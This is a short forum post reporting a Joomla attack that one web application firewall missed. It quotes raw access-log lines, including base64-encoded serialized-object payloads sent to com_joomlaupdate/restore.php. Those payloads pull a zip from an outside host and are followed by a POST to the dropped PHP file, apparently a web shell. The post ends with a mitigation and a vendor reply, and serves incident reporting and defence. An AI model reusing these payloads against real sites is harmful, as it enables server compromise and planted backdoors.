Joomla Exploit not detected

This night a client was attacked, with a joomla exploit, that server with comod WAF didn’t stop, but server with OWASP stoped.

Pages about this exploit:

String used by the attacker to use the exploit:

81.163.131.58 - - [14/Apr/2015:21:03:03 +0100] "GET /sindite/administrator/components/com_joomlaupdate/restore.php?task=stepRestore&factory=Tzo5OiJBS0ZhY3RvcnkiOjE6e3M6MTg6IgBBS0ZhY3RvcnkAdmFybGlzdCI7YToyOntzOjI3OiJraWNrc3RhcnQuc2VjdXJpdHkucGFzc3dvcmQiO3M6MDoiIjtzOjI2OiJraWNrc3RhcnQuc2V0dXAuc291cmNlZmlsZSI7czozODoiaHR0cDovL29yZW5yc3V0ZS5ydS9pbWFnZXMvd3Q1MTI0bi56aXAiO319 HTTP/1.1" 200 3841 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
81.163.131.58 - - [14/Apr/2015:21:03:04 +0100] "GET /sindite/administrator/components/com_joomlaupdate/restore.php?task=stepRestore&factory=Tzo5OiJBS0ZhY3RvcnkiOjI6e3M6MjE6IgBBS0ZhY3RvcnkAb2JqZWN0bGlzdCI7YToyOntzOjE1OiJBS1VuYXJjaGl2ZXJaSVAiO086MTU6IkFLVW5hcmNoaXZlclpJUCI6MzU6e3M6MjA6ImV4cGVjdERhdGFEZXNjcmlwdG9yIjtiOjA7czozNDoiAEFLVW5hcmNoaXZlckpQQQBhcmNoaXZlSGVhZGVyRGF0YSI7YTowOnt9czoxMToiACoAZmlsZW5hbWUiO3M6Mzg6Imh0dHA6Ly9vcmVucnN1dGUucnUvaW1hZ2VzL3d0NTEyNG4uemlwIjtzOjExOiJhcmNoaXZlTGlzdCI7YToxOntpOjA7czozODoiaHR0cDovL29yZW5yc3V0ZS5ydS9pbWFnZXMvd3Q1MTI0bi56aXAiO31zOjk6InRvdGFsU2l6ZSI7aTowO3M6MjA6IgAqAGN1cnJlbnRQYXJ0TnVtYmVyIjtpOi0xO3M6MjA6IgAqAGN1cnJlbnRQYXJ0T2Zmc2V0IjtpOjA7czoyNToiACoAZmxhZ1Jlc3RvcmVQZXJtaXNzaW9ucyI7aTowO3M6MTc6IgAqAHBvc3RQcm9jRW5naW5lIjtPOjE2OiJBS1Bvc3Rwcm9jRGlyZWN0Ijo4OntzOjExOiIAKgBmaWxlbmFtZSI7TjtzOjg6IgAqAHBlcm1zIjtpOjQ5MztzOjE1OiIAKgB0ZW1wRmlsZW5hbWUiO047czo5OiJ0aW1lc3RhbXAiO2k6MDtzOjI1OiIAQUtBYnN0cmFjdE9iamVjdABfZXJyb3JzIjthOjA6e31zOjIxOiIAKgBfZXJyb3JzX3F1ZXVlX3NpemUiO2k6MDtzOjI3OiIAQUtBYnN0cmFjdE9iamVjdABfd2FybmluZ3MiO2E6MDp7fXM6MjM6IgAqAF93YXJuaW5nc19xdWV1ZV9zaXplIjtpOjA7fXM6MTA6IgAqAGFkZFBhdGgiO3M6Nzc6Ii9ob21lL3NpbmRpdGVwL3B1YmxpY19odG1sL3NpbmRpdGUvYWRtaW5pc3RyYXRvci9jb21wb25lbnRzL2NvbV9qb29tbGF1cGRhdGUvIjtzOjExOiJyZW5hbWVGaWxlcyI7YToyOntzOjk6Ii5odGFjY2VzcyI7czoxMjoiaHRhY2Nlc3MuYmFrIjtzOjc6InBocC5pbmkiO3M6MTE6InBocC5pbmkuYmFrIjt9czoxMDoicmVuYW1lRGlycyI7YTowOnt9czo5OiJza2lwRmlsZXMiO2E6Nzp7aTowO3M6MTE6InJlc3RvcmUucGhwIjtpOjE7czoxMzoia2lja3N0YXJ0LnBocCI7aToyO3M6MTc6ImFiaWF1dG9tYXRpb24uaW5pIjtpOjM7czoxMjoiaHRhY2Nlc3MuYmFrIjtpOjQ7czoxMToicGhwLmluaS5iYWsiO2k6NTtzOjQ3OiJhZG1pbmlzdHJhdG9yL2NvbXBvbmVudHMvY29tX2FrZWViYS9yZXN0b3JlLnBocCI7aTo2O3M6NTE6ImFkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21fYWtlZWJhL3Jlc3RvcmF0aW9uLnBocCI7fXM6MTI6IgAqAGNodW5rU2l6ZSI7aTo1MjQyODg7czo1OiIAKgBmcCI7YjowO3M6MTE6IgAqAHJ1blN0YXRlIjtpOjA7czoxMzoiACoAZmlsZUhlYWRlciI7TjtzOjE3OiIAKgBkYXRhUmVhZExlbmd0aCI7aTowO3M6MTM6IgAqAGlzUHJlcGFyZWQiO2I6MTtzOjEyOiIAKgBpc1J1bm5pbmciO2I6MDtzOjEzOiIAKgBpc0ZpbmlzaGVkIjtiOjA7czo5OiIAKgBoYXNSYW4iO2I6MDtzOjE2OiIAKgBhY3RpdmVfZG9tYWluIjtzOjA6IiI7czoxNDoiACoAYWN0aXZlX3N0ZXAiO3M6MDoiIjtzOjE3OiIAKgBhY3RpdmVfc3Vic3RlcCI7czowOiIiO3M6MTk6IgAqAF9wYXJhbWV0ZXJzQXJyYXkiO2E6Njp7czo4OiJmaWxlbmFtZSI7czozODoiaHR0cDovL29yZW5yc3V0ZS5ydS9pbWFnZXMvd3Q1MTI0bi56aXAiO3M6MTk6InJlc3RvcmVfcGVybWlzc2lvbnMiO2k6MDtzOjk6InBvc3RfcHJvYyI7czo2OiJkaXJlY3QiO3M6ODoiYWRkX3BhdGgiO3M6NzY6Ii9ob21lL3NpbmRpdGVwL3B1YmxpY19odG1sL3NpbmRpdGUvYWRtaW5pc3RyYXRvci9jb21wb25lbnRzL2NvbV9qb29tbGF1cGRhdGUiO3M6MTI6InJlbmFtZV9maWxlcyI7YToyOntzOjk6Ii5odGFjY2VzcyI7czoxMjoiaHRhY2Nlc3MuYmFrIjtzOjc6InBocC5pbmkiO3M6MTE6InBocC5pbmkuYmFrIjt9czoxMDoic2tpcF9maWxlcyI7YTo3OntpOjA7czoxMToicmVzdG9yZS5waHAiO2k6MTtzOjEzOiJraWNrc3RhcnQucGhwIjtpOjI7czoxNzoiYWJpYXV0b21hdGlvbi5pbmkiO2k6MztzOjEyOiJodGFjY2Vzcy5iYWsiO2k6NDtzOjExOiJwaHAuaW5pLmJhayI7aTo1O3M6NDc6ImFkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21fYWtlZWJhL3Jlc3RvcmUucGhwIjtpOjY7czo1MToiYWRtaW5pc3RyYXRvci9jb21wb25lbnRzL2NvbV9ha2VlYmEvcmVzdG9yYXRpb24ucGhwIjt9fXM6MTU6IgAqAGRhdGFiYXNlUm9vdCI7YTowOnt9czozMjoiAEFLQWJzdHJhY3RQYXJ0AHdhcm5pbmdzX3BvaW50ZXIiO2k6MDtzOjEyOiIAKgBvYnNlcnZlcnMiO2E6MTp7czoxOToiUmVzdG9yYXRpb25PYnNlcnZlciI7TzoxOToiUmVzdG9yYXRpb25PYnNlcnZlciI6Mzp7czoxNToiY29tcHJlc3NlZFRvdGFsIjtpOjA7czoxNzoidW5jb21wcmVzc2VkVG90YWwiO2k6MDtzOjE0OiJmaWxlc1Byb2Nlc3NlZCI7aTowO319czoyNToiAEFLQWJzdHJhY3RPYmplY3QAX2Vycm9ycyI7YTowOnt9czoyMToiACoAX2Vycm9yc19xdWV1ZV9zaXplIjtpOjA7czoyNzoiAEFLQWJzdHJhY3RPYmplY3QAX3dhcm5pbmdzIjthOjA6e31zOjIzOiIAKgBfd2FybmluZ3NfcXVldWVfc2l6ZSI7aTowO3M6MTc6ImFyY2hpdmVIZWFkZXJEYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czo2OiJoYXNSdW4iO2I6MDt9czoxNjoiQUtQb3N0cHJvY0RpcmVjdCI7cjoxMzt9czoxODoiAEFLRmFjdG9yeQB2YXJsaXN0IjthOjM6e3M6Mjc6ImtpY2tzdGFydC5zZWN1cml0eS5wYXNzd29yZCI7czowOiIiO3M6MjY6ImtpY2tzdGFydC5zZXR1cC5zb3VyY2VmaWxlIjtzOjM4OiJodHRwOi8vb3JlbnJzdXRlLnJ1L2ltYWdlcy93dDUxMjRuLnppcCI7czoxNzoia2lja3N0YXJ0LmVuYWJsZWQiO2I6MTt9fQ== HTTP/1.1" 200 114 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
81.163.131.58 - - [14/Apr/2015:21:03:05 +0100] "POST /sindite/administrator/components/com_joomlaupdate/wt5124n.php HTTP/1.1" 200 9 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Solution for now, remove the restore.php from com_joomlaupdate (by akeeba).

Thank you for your report. Will be fixed.